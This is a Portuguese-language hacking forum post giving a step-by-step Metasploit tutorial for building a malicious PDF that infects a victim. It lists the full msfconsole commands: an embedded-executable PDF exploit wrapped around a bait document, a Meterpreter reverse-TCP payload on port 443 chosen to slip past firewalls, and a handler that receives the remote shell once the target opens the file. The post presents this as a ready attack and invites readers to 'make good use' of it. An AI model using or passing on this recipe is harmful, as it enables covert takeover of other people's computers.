Olá, Visitante!         Registrar

Avaliação do Tópico:
  • 0 votos - 0 Média
  • 1
  • 2
  • 3
  • 4
  • 5
[TUTORIAL] Como criar e infectar o alvo com um PDF Malicioso com Metasploit
blackunix  


Owner

Mensagens: 29
Tópicos: 24
Registrado: Setembro 2017
Likes 2
Nível de Aviso:


Creditos: 332,42
#1
Como criar e infectar o alvo com um PDF Malicioso com Metasploit
Estarei usando uma maquina virtual como teste.

Vamos lá



Abre o metasploit

[email protected]:~# msfconsole



Entre com search adobe
Ou entre com esse comando
msf> use exploit/windows/fileformat/adobe_pdf_embedded.exe



Vamos precisar do filename, laucnh messenge (mensagem que vai aparecer no momento que a vitima acessar)
file name = nome do arquivo
entre com:
msf> set filename seunome.pdf

Agora você vai procurar um arquivo em pdf que você irá utilizar como base, pode ser qualquer pdf e agora vamos setar onde ele está

msf> set infilename /root/Downloads/01-canais-dissimulados.pdf << o diretorio onde esta seu pdf de esscolha

msf> set payload windows/meterpreter/reverse_tcp

msf> set lhost "seu ip aqui"

msf> set lport  443 ( más pq usei uma porta diferente? Pq se você encontra um server com um firewall bem configurado por padrao não vai deixar a porta 4444 aberta)





De um: msf> show options

msf> exploit

Agora vai gerar o pdf e irá mostrar onde foi salvo o pdf


Volte no seu msfconsole e de o comando msf>back
entre com
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> show options

agora configure igual você configurou lá em cima com o ip e a mesma porta

Dê um msf> exploit

Agora irei abrir o pdf na minha maquina teste



Vai aparecer a mensagem que nós vimos nas configurações launch messenger

Depois de abrir o pdf na minha maquina teste abriu a conexão pra mim no metasploit



Agora é só ter imaginação e fazer um bom uso!











23-05-2018, 21:18
Procurar Responder


Saltar Fórum:


usuários a ver este tópico: 1 Visitante(s)